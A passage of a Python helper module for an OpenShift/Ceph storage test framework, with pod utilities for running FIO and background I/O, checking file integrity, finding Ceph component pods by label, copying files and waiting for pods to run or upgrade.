(e.g. the default is 75 which means it is 75%/25% which
equivalent to 3 reads are performed for every 1 write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
end_fsync (int): If 1, fio will sync file contents when a write
stage has completed. Fio default is 0
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == "rw":
self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
self.io_params["rwmixread"] = rw_ratio
else:
self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
self.io_params["runtime"] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.io_params["iodepth"] = depth
self.io_params["rate"] = rate
self.io_params["rate_process"] = rate_process
self.io_params["bs"] = bs
if end_fsync:
self.io_params["end_fsync"] = end_fsync
self.fio_thread = self.wl_obj.run(**self.io_params)
def fillup_fs(self, size, fio_filename=None):
"""
Execute FIO on a pod to fillup a file
This will run sequantial IO of 1MB block size to fill up the fill with data
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
size (str): Size in MB, e.g. '200M'
fio_filename(str): Name of fio file created on app pod's mount point
"""
if not self.wl_setup_done:
self.workload_setup(storage_type="fs", jobs=1)
self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
size = size if isinstance(size, str) else f"{size}M"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self):
"""
Execute git clone on a pod to simulate a Jenkins user
"""
name = "test_workload"
work_load = "jenkins"
wl = workload.WorkLoad(
name=name, work_load=work_load, pod=self, path=self.get_storage_path()
)
assert wl.setup(), "Setup up for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = " ".join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f'scp -i {authkey} -o "StrictHostKeyChecking no"'
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self):
"""
Get the pod memory size
Returns:
dict: The names of the pod's containers (str) as keys and their memory
size (str) as values
"""
containers = self.pod_data.get("spec").get("containers")
container_names_and_memory = {
container.get("name"): container.get("resources")
.get("limits")
.get("memory")
for container in containers
}
return container_names_and_memory
def get_node(self):
"""
Gets the node name
Returns:
str: Node name
"""
if config.ENV_DATA.get("platform", "").lower() == "aws":
return self.pod_data["spec"]["nodeSelector"]["kubernetes.io/hostname"]
else:
return self.pod_data["spec"]["nodeName"]
# Helper functions for Pods
def get_all_pods(
    namespace=None,
    selector=None,
    selector_label="app",
    exclude_selector=False,
    wait=False,
):
    """
    Get all pods in a namespace.

    Args:
        namespace (str): Name of the namespace
            If namespace is None - get all pods
        selector (list) : List of the resource selector to search with.
            Example: ['alertmanager','prometheus']
        selector_label (str): Label of selector (default: app).
        exclude_selector (bool): If True, return the pods that do NOT match
            the selector instead
        wait (bool): If True, sleep before listing so pods failed over to
            other nodes have time to come up

    Returns:
        list: List of Pod objects
    """
    ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
    # In case of >4 worker nodes node failures automatic failover of pods to
    # other nodes will happen.
    # So, we are waiting for the pods to come up on new node
    if wait:
        wait_time = 180
        logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
        time.sleep(wait_time)
    pods = ocp_pod_obj.get()["items"]
    if selector:

        def _selected(pod):
            return pod["metadata"].get("labels", {}).get(selector_label) in selector

        if exclude_selector:
            pods = [pod for pod in pods if not _selected(pod)]
        else:
            pods = [pod for pod in pods if _selected(pod)]
    return [Pod(**pod) for pod in pods]
def get_ceph_tools_pod():
    """
    Get the Ceph tools pod

    Returns:
        Pod object: The Ceph tools pod object
    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
    )
    ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
    if not ct_pod_items:
        # setup ceph_toolbox pod if the cluster has been setup by some other CI
        setup_ceph_toolbox()
        ct_pod_items = ocp_pod_obj.get(selector="app=rook-ceph-tools")["items"]
    assert ct_pod_items, "No Ceph tools pod found"
    # In the case of node failure, the CT pod will be recreated with the old
    # one in status Terminated. Therefore, need to filter out the Terminated pod
    running_ct_pods = [
        item
        for item in ct_pod_items
        if ocp_pod_obj.get_resource_status(item.get("metadata").get("name"))
        == constants.STATUS_RUNNING
    ]
    assert running_ct_pods, "No running Ceph tools pod found"
    return Pod(**running_ct_pods[0])
def get_csi_provisioner_pod(interface):
    """
    Get the provisioner pod based on interface

    Args:
        interface (str): Interface type, e.g. constants.CEPHBLOCKPOOL

    Returns:
        tuple: Names (str) of the first two provisioner pods for the
        given interface
    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace=config.ENV_DATA["cluster_namespace"]
    )
    if interface == constants.CEPHBLOCKPOOL:
        selector = "app=csi-rbdplugin-provisioner"
    else:
        selector = "app=csi-cephfsplugin-provisioner"
    provision_pod_items = ocp_pod_obj.get(selector=selector)["items"]
    assert provision_pod_items, f"No {interface} provisioner pod found"
    # NOTE(review): assumes at least two provisioner pods exist — confirm.
    return (
        Pod(**provision_pod_items[0]).name,
        Pod(**provision_pod_items[1]).name,
    )
def get_csi_snapshoter_pod():
    """
    Get the csi snapshot controller pod

    Returns:
        str: Name of the csi snapshot controller pod
    """
    ocp_pod_obj = OCP(
        kind=constants.POD, namespace="openshift-cluster-storage-operator"
    )
    items = ocp_pod_obj.get(selector="app=csi-snapshot-controller")["items"]
    return Pod(**items[0]).name
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
    """
    Fetches info about rgw pods in the cluster

    Args:
        rgw_label (str): label associated with rgw pods
            (default: defaults.RGW_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: Pod objects of rgw pods
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(rgw_label, ns)]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
    """
    Fetches info about the ocs-operator pod in the cluster.

    Args:
        ocs_label (str): label associated with ocs_operator pod
            (default: defaults.OCS_OPERATOR_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        Pod object: ocs_operator pod object
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    matches = get_pods_having_label(ocs_label, ns)
    return Pod(**matches[0])
def list_ceph_images(pool_name="rbd"):
    """
    List the RBD images in a Ceph pool.

    Args:
        pool_name (str): Name of the pool to get the ceph images

    Returns:
        list: List of RBD images in the pool
    """
    tools_pod = get_ceph_tools_pod()
    return tools_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format="json")
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
    """
    Check if file exists inside the pod

    Args:
        pod_obj (Pod): The object of the pod
        file_path (str): The full path of the file to look for inside
            the pod

    Returns:
        bool: True if the file exist, False otherwise
    """
    try:
        check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
    except CommandFailed:
        pod_obj.install_packages("findutils")
    ret = pod_obj.exec_cmd_on_pod(f'bash -c "find {file_path}"')
    # Escape the path: a raw re.search would treat path characters such as
    # '.' or '+' as regex metacharacters and could match the wrong output.
    if re.search(re.escape(file_path), ret):
        return True
    return False
def get_file_path(pod_obj, file_name):
    """
    Get the full path of the file under the pod's first volume mount.

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which path to get

    Returns:
        str: The full path of the file
    """
    mount_path = (
        pod_obj.get()
        .get("spec")
        .get("containers")[0]
        .get("volumeMounts")[0]
        .get("mountPath")
    )
    return os.path.join(mount_path, file_name)
def cal_md5sum(pod_obj, file_name, block=False):
    """
    Calculates the md5sum of the file

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which md5sum to be calculated
        block (bool): True if the volume mode of PVC used on pod is 'Block'.
            file_name will be the devicePath in this case.

    Returns:
        str: The md5sum of the file
    """
    # For block mode the caller passes the device path directly.
    if block:
        file_path = file_name
    else:
        file_path = get_file_path(pod_obj, file_name)
    output = pod_obj.exec_cmd_on_pod(
        command=f'bash -c "md5sum {file_path}"', out_yaml_format=False
    )
    # md5sum prints "<digest>  <path>"; the digest is the first token.
    md5sum = output.split()[0]
    logger.info(f"md5sum of file {file_name}: {md5sum}")
    return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum, block=False):
    """
    Verifies existence and md5sum of file created from first pod

    Args:
        pod_obj (Pod): The object of the pod
        file_name (str): The name of the file for which md5sum to be calculated
        original_md5sum (str): The original md5sum of the file
        block (bool): True if the volume mode of PVC used on pod is 'Block'.
            file_name will be the devicePath in this case.

    Returns:
        bool: True if the file exists and md5sum matches

    Raises:
        AssertionError: If file doesn't exist or md5sum mismatch
    """
    file_path = file_name if block else get_file_path(pod_obj, file_name)
    assert check_file_existence(pod_obj, file_path), f"File {file_name} doesn't exists"
    current_md5sum = cal_md5sum(pod_obj, file_name, block)
    logger.info(f"Original md5sum of file: {original_md5sum}")
    logger.info(f"Current md5sum of file: {current_md5sum}")
    assert current_md5sum == original_md5sum, "Data corruption found"
    logger.info(f"File {file_name} exists and md5sum matches")
    return True
def get_fio_rw_iops(pod_obj):
    """
    Fetch FIO results from a pod and log the read/write IOPs.

    Args:
        pod_obj (Pod): The object of the pod
    """
    fio_result = pod_obj.get_fio_results()
    logging.info(f"FIO output: {fio_result}")
    first_job = fio_result.get("jobs")[0]
    logging.info("IOPs after FIO:")
    logging.info(f"Read: {first_job.get('read').get('iops')}")
    logging.info(f"Write: {first_job.get('write').get('iops')}")
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
    """
    Run I/O in the background

    Args:
        pod_obj (Pod): The object of the pod
        expect_to_fail (bool): True for the command to be expected to fail
            (disruptive operations), False otherwise
        fedora_dc (bool): set to False by default. If set to True, it runs IO in
            background on a fedora dc pod.

    Returns:
        Thread: A thread of the I/O execution
    """
    logger.info(f"Running I/O on pod {pod_obj.name}")

    def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
        """
        Execute I/O
        """
        try:
            # Writing content to a new file every 0.01 seconds.
            # Without sleep, the device will run out of space very quickly -
            # 5-10 seconds for a 5GB device
            # NOTE(review): TEST_FILE / FEDORA_TEST_FILE / TEXT_CONTENT are
            # module-level constants defined elsewhere in this module.
            if fedora_dc:
                FILE = FEDORA_TEST_FILE
            else:
                FILE = TEST_FILE
            pod_obj.exec_cmd_on_pod(
                command=f'bash -c "let i=0; while true; do echo '
                f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"',
                timeout=2400,
            )
        # Once the pod gets deleted, the I/O execution will get terminated.
        # Hence, catching this exception
        except CommandFailed as ex:
            if expect_to_fail:
                # Exit codes 137/143 correspond to the command being killed
                # (SIGKILL/SIGTERM) when the pod goes away.
                if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))):
                    logger.info("I/O command got terminated as expected")
                    return
            raise ex

    thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
    thread.start()
    # Give the background writer a moment before probing for its first file.
    time.sleep(2)
    # Checking file existence
    if fedora_dc:
        FILE = FEDORA_TEST_FILE
    else:
        FILE = TEST_FILE
    # The writer appends an incrementing suffix; "1" is its second file,
    # so its existence proves at least one write iteration completed.
    test_file = FILE + "1"
    # Check I/O started
    try:
        for sample in TimeoutSampler(
            timeout=20,
            sleep=1,
            func=check_file_existence,
            pod_obj=pod_obj,
            file_path=test_file,
        ):
            if sample:
                break
            logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
    except TimeoutExpiredError:
        logger.error(
            f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
            "Collect file list."
        )
        # Dump the parent directory listing for debugging before failing.
        parent_dir = os.path.join(TEST_FILE, os.pardir)
        pod_obj.exec_cmd_on_pod(
            command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False
        )
        raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
    return thread
def get_admin_key_from_ceph_tools():
    """
    Fetches admin key secret from ceph

    Returns:
        str: admin keyring encoded with base64
    """
    out = get_ceph_tools_pod().exec_ceph_cmd(
        ceph_cmd="ceph auth get-key client.admin"
    )
    return base64.b64encode(out["key"].encode()).decode()
def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"):
    """
    Run I/O on mount point

    Args:
        pod_obj (Pod): The object of the pod
        bs (str): Read and write up to bytes at a time
        count (str): Copy only N input blocks

    Returns:
        used_percentage (str): Used percentage on mount point
    """
    pod_obj.exec_cmd_on_pod(
        command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
    )
    # Verify data's are written to mount-point by inspecting df output:
    # the "Use%" column directly precedes the mount point token.
    df_tokens = pod_obj.exec_cmd_on_pod(command="df -kh").split()
    return df_tokens[df_tokens.index("/var/lib/www/html") - 1]
def get_pods_having_label(label, namespace):
    """
    Fetches pod resources with given label in given namespace

    Args:
        label (str): label which pods might have
        namespace (str): Namespace in which to be looked up

    Returns:
        list: of pods info
    """
    ocp_pod = OCP(kind=constants.POD, namespace=namespace)
    return ocp_pod.get(selector=label).get("items")
def get_deployments_having_label(label, namespace):
    """
    Fetches deployment resources with given label in given namespace

    Args:
        label (str): label which deployments might have
        namespace (str): Namespace in which to be looked up

    Returns:
        list: deployment OCP instances
    """
    ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
    return ocp_deployment.get(selector=label).get("items")
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
    """
    Fetches info about mds pods in the cluster

    Args:
        mds_label (str): label associated with mds pods
            (default: defaults.MDS_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: mds pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(mds_label, ns)]
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
    """
    Fetches info about mon pods in the cluster

    Args:
        mon_label (str): label associated with mon pods
            (default: defaults.MON_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: mon pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(mon_label, ns)]
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
    """
    Fetches info about mgr pods in the cluster

    Args:
        mgr_label (str): label associated with mgr pods
            (default: defaults.MGR_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: mgr pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(mgr_label, ns)]
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
    """
    Fetches info about osd pods in the cluster

    Args:
        osd_label (str): label associated with osd pods
            (default: defaults.OSD_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: osd pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(osd_label, ns)]
def get_osd_prepare_pods(
    osd_prepare_label=constants.OSD_PREPARE_APP_LABEL,
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
):
    """
    Fetches info about osd prepare pods in the cluster

    Args:
        osd_prepare_label (str): label associated with osd prepare pods
            (default: constants.OSD_PREPARE_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: defaults.ROOK_CLUSTER_NAMESPACE)

    Returns:
        list: OSD prepare pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(osd_prepare_label, ns)]
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
    """
    Fetches info about osd deployments in the cluster

    Args:
        osd_label (str): label associated with osd deployments
            (default: defaults.OSD_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: OSD deployment OCS instances
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [OCS(**item) for item in get_deployments_having_label(osd_label, ns)]
def get_pod_count(label, namespace=None):
    """
    Count pods carrying a given label.

    Args:
        label (str): label which pods might have
        namespace (str): Namespace in which to be looked up
            (default: the configured cluster namespace)

    Returns:
        int: Number of pods matching the label
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return len(get_pods_having_label(label=label, namespace=ns))
def get_cephfsplugin_provisioner_pods(
    cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
    namespace=None,
):
    """
    Fetches info about CSI Cephfs plugin provisioner pods in the cluster

    Args:
        cephfsplugin_provisioner_label (str): label associated with cephfs
            provisioner pods
            (default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: csi-cephfsplugin-provisioner Pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [
        Pod(**item)
        for item in get_pods_having_label(cephfsplugin_provisioner_label, ns)
    ]
def get_rbdfsplugin_provisioner_pods(
    rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
    namespace=None,
):
    """
    Fetches info about CSI RBD plugin provisioner pods in the cluster

    Args:
        rbdplugin_provisioner_label (str): label associated with RBD
            provisioner pods
            (default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: csi-rbdplugin-provisioner Pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [
        Pod(**item)
        for item in get_pods_having_label(rbdplugin_provisioner_label, ns)
    ]
def get_pod_obj(name, namespace=None):
    """
    Returns the pod obj for the given pod

    Args:
        name (str): Name of the resource
        namespace (str): Namespace to look the pod up in

    Returns:
        Pod: A pod object
    """
    ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace)
    return Pod(**ocp_obj.get(resource_name=name))
def get_pod_logs(
    pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False
):
    """
    Get logs from a given pod

    Args:
        pod_name (str): Name of the pod
        container (str): Name of the container
        namespace (str): Namespace of the pod
        previous (bool): True, if pod previous log required. False otherwise.

    Returns:
        str: Output from 'oc get logs <pod_name>' command
    """
    pod = OCP(kind=constants.POD, namespace=namespace)
    cmd = f"logs {pod_name}"
    if container:
        cmd = f"{cmd} -c {container}"
    if previous:
        cmd = f"{cmd} --previous"
    return pod.exec_oc_cmd(cmd, out_yaml_format=False)
def get_pod_node(pod_obj):
    """
    Get the node that the pod is running on

    Args:
        pod_obj (OCS): The pod object

    Returns:
        ocs_ci.ocs.ocp.OCP: The node object
    """
    node_name = pod_obj.get().get("spec").get("nodeName")
    node_objs = node.get_node_objs(node_names=node_name)
    return node_objs[0]
def delete_pods(pod_objs, wait=True):
    """
    Deletes list of the pod objects

    Args:
        pod_objs (list): List of the pod objects to be deleted
        wait (bool): Determines if the delete command should wait for
            completion
    """
    for pod_obj in pod_objs:
        pod_obj.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
    """
    Verifies the list of the pods are respinned and in running state

    Args:
        pod_objs_list (list): List of the pods obj

    Returns:
        bool: True if the pods are respinned and running, False otherwise

    Raises:
        ResourceWrongStatusException: In case the resources hasn't
            reached the Running state
    """
    # First, every pod must reach Running state.
    for pod in pod_objs_list:
        helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
    # Then verify each pod was started within the last hour, i.e. respinned.
    for pod in pod_objs_list:
        start_time = pod.get()["status"]["startTime"]
        started_ts = calendar.timegm(
            time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ")
        )
        age_seconds = time.time() - started_ts
        if (age_seconds / 3600) >= 1:
            logger.error(
                f"Pod {pod.name} is not respinned, the age of the pod is {start_time}"
            )
            return False
    return True
def verify_node_name(pod_obj, node_name):
    """
    Verifies that the pod is running on a particular node

    Args:
        pod_obj (Pod): The pod object
        node_name (str): The name of node to check

    Returns:
        bool: True if the pod is running on a particular node, False otherwise
    """
    logger.info(
        f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}"
    )
    actual_node = pod_obj.get().get("spec").get("nodeName")
    if actual_node != node_name:
        logger.info(
            f"The pod {pod_obj.name} is not running on the specified node "
            f"specified node: {node_name}, actual node: {actual_node}"
        )
        return False
    logger.info(
        f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}"
    )
    return True
def get_pvc_name(pod_obj):
    """
    Function to get pvc_name from pod_obj

    Args:
        pod_obj (Pod): The pod object

    Returns:
        str: The pvc name of a given pod_obj

    Raises:
        UnavailableResourceException: If no pvc attached
    """
    first_volume = pod_obj.get().get("spec").get("volumes")[0]
    pvc = first_volume.get("persistentVolumeClaim")
    if not pvc:
        raise UnavailableResourceException
    return pvc.get("claimName")
def get_used_space_on_mount_point(pod_obj):
    """
    Get the used space on a mount point

    Args:
        pod_obj (POD): The pod object

    Returns:
        str: Percentage representing the used space on the mount point
    """
    # The "Use%" column of df output directly precedes the mount point token.
    df_tokens = pod_obj.exec_cmd_on_pod(command="df -kh").split()
    return df_tokens[df_tokens.index(constants.MOUNT_POINT) - 1]
def get_plugin_pods(interface, namespace=None):
    """
    Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods

    Args:
        interface (str): Interface type. eg: CephBlockPool, CephFileSystem
        namespace (str): Name of cluster namespace

    Returns:
        list: csi-cephfsplugin pod objects or csi-rbdplugin pod objects
    """
    # NOTE(review): an interface matching neither constant leaves the label
    # unset, as in the original implementation.
    if interface == constants.CEPHFILESYSTEM:
        plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
    if interface == constants.CEPHBLOCKPOOL:
        plugin_label = constants.CSI_RBDPLUGIN_LABEL
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(plugin_label, ns)]
def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"):
    """
    Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod

    Args:
        interface (str): Interface type. eg: CephBlockPool, CephFileSystem
        namespace (str): Name of cluster namespace
        leader_type (str): Parameter to check the lease. eg: 'snapshotter' to
            select external-snapshotter leader holder

    Returns:
        Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
        pod
    """
    namespace = namespace or config.ENV_DATA["cluster_namespace"]
    # Each sidecar type owns a differently-named lease object.
    leader_types = {
        "provisioner": namespace,
        "snapshotter": f"external-snapshotter-leader-{namespace}",
        "resizer": f"external-resizer-{namespace}",
        "attacher": f"external-attacher-{namespace}",
    }
    if interface == constants.CEPHBLOCKPOOL:
        lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml"
    elif interface == constants.CEPHFILESYSTEM:
        lease_cmd = (
            f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml"
        )
    ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace)
    lease = ocp_obj.exec_oc_cmd(command=lease_cmd)
    # The lease holder identity is the name of the current leader pod.
    leader = lease.get("spec").get("holderIdentity").strip()
    assert leader, "Couldn't identify plugin provisioner leader pod."
    logger.info(f"Plugin provisioner leader pod is {leader}")
    ocp_obj._resource_name = leader
    return Pod(**ocp_obj.get())
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
    """
    Fetches info about rook-ceph-operator pods in the cluster

    Args:
        operator_label (str): Label associated with rook-ceph-operator pod
        namespace (str): Namespace in which ceph cluster lives

    Returns:
        list: rook-ceph-operator pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(operator_label, ns)]
def upload(pod_name, localpath, remotepath, namespace=None):
    """
    Upload a file to pod

    Args:
        pod_name (str): Name of the pod
        localpath (str): Local file to upload
        remotepath (str): Target path on the pod
        namespace (str): Namespace of the pod (default: constants.DEFAULT_NAMESPACE)
    """
    namespace = namespace or constants.DEFAULT_NAMESPACE
    src = os.path.expanduser(localpath)
    run_cmd(f"oc -n {namespace} cp {src} {pod_name}:{remotepath}")
def download_file_from_pod(pod_name, remotepath, localpath, namespace=None):
    """
    Download a file from a pod

    Args:
        pod_name (str): Name of the pod
        remotepath (str): Source path on the pod
        localpath (str): Local destination path
        namespace (str): The namespace of the pod
    """
    namespace = namespace or constants.DEFAULT_NAMESPACE
    dst = os.path.expanduser(localpath)
    run_cmd(f"oc -n {namespace} cp {pod_name}:{remotepath} {dst}")
def wait_for_storage_pods(timeout=200):
    """
    Check all OCS pods status, they should be in Running or Completed state

    Args:
        timeout (int): Number of seconds to wait for pods to get into correct
            state
    """
    all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
    # Ignoring pods with "app=rook-ceph-detect-version" app label
    all_pod_obj = [
        pod
        for pod in all_pod_obj
        if pod.get_labels()
        and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels()
    ]
    for pod_obj in all_pod_obj:
        state = constants.STATUS_RUNNING
        # Deploy and deviceset pods are expected to finish rather than keep
        # running, so their target state is Completed.
        if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]):
            state = constants.STATUS_COMPLETED
        try:
            helpers.wait_for_resource_state(
                resource=pod_obj, state=state, timeout=timeout
            )
        except ResourceWrongStatusException:
            # 'rook-ceph-crashcollector' on the failed node stucks at
            # pending state. BZ 1810014 tracks it.
            # Ignoring 'rook-ceph-crashcollector' pod health check as
            # WA and deleting its deployment so that the pod
            # disappears. Will revert this WA once the BZ is fixed
            if "rook-ceph-crashcollector" in pod_obj.name:
                ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
                pod_name = pod_obj.name
                # The owning deployment name is the pod name without its two
                # trailing hash segments.
                deployment_name = "-".join(pod_name.split("-")[:-2])
                command = f"delete deployment {deployment_name}"
                ocp_obj.exec_oc_cmd(command=command)
                logger.info(f"Deleted deployment for pod {pod_obj.name}")
            else:
                raise
def verify_pods_upgraded(old_images, selector, count=1, timeout=720):
    """
    Verify that all pods do not have old image.

    Args:
        old_images (set): Set with old images.
        selector (str): Selector (e.g. app=ocs-osd)
        count (int): Number of resources for selector.
        timeout (int): Timeout in seconds to wait for pods to be upgraded.

    Raises:
        TimeoutException: If the pods didn't get upgraded till the timeout.
    """
    namespace = config.ENV_DATA["cluster_namespace"]
    pod = OCP(
        kind=constants.POD,
        namespace=namespace,
    )
    info_message = (
        f"Waiting for {count} pods with selector: {selector} to be running "
        f"and upgraded."
    )
    logger.info(info_message)
    start_time = time.time()
    selector_label, selector_value = selector.split("=")
    while True:
        pod_count = 0
        # Initialize before the try block: if get_all_pods raises
        # CommandFailed on the very first iteration, pods_len would
        # otherwise be unbound and the check below would raise NameError.
        pods_len = 0
        try:
            pods = get_all_pods(namespace, [selector_value], selector_label)
            pods_len = len(pods)
            logger.info(f"Found {pods_len} pod(s) for selector: {selector}")
            if pods_len != count:
                logger.warning(
                    f"Number of found pods {pods_len} is not as expected: " f"{count}"
                )
            for pod in pods:
                verify_images_upgraded(old_images, pod.get())
                pod_count += 1
        except CommandFailed as ex:
            logger.warning(
                f"Failed when getting pods with selector {selector}." f"Error: {ex}"
            )
        except NonUpgradedImagesFoundError as ex:
            logger.warning(ex)
        check_timeout_reached(start_time, timeout, info_message)
        if pods_len != count:
            logger.error(f"Found pods: {pods_len} but expected: {count}!")
        elif pod_count == count:
            return
def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None):
    """
    Fetches info about noobaa pods in the cluster

    Args:
        noobaa_label (str): label associated with noobaa pods
            (default: defaults.NOOBAA_APP_LABEL)
        namespace (str): Namespace in which ceph cluster lives
            (default: the configured cluster namespace)

    Returns:
        list: noobaa pod objects
    """
    ns = namespace or config.ENV_DATA["cluster_namespace"]
    return [Pod(**item) for item in get_pods_having_label(noobaa_label, ns)]
def wait_for_dc_app_pods_to_reach_running_state(
    dc_pod_obj, timeout=120, exclude_state=None
):
    """
    Wait for DC app pods to reach running state

    Args:
        dc_pod_obj (list): list of dc app pod objects
        timeout (int): Timeout in seconds to wait for pods to be in Running
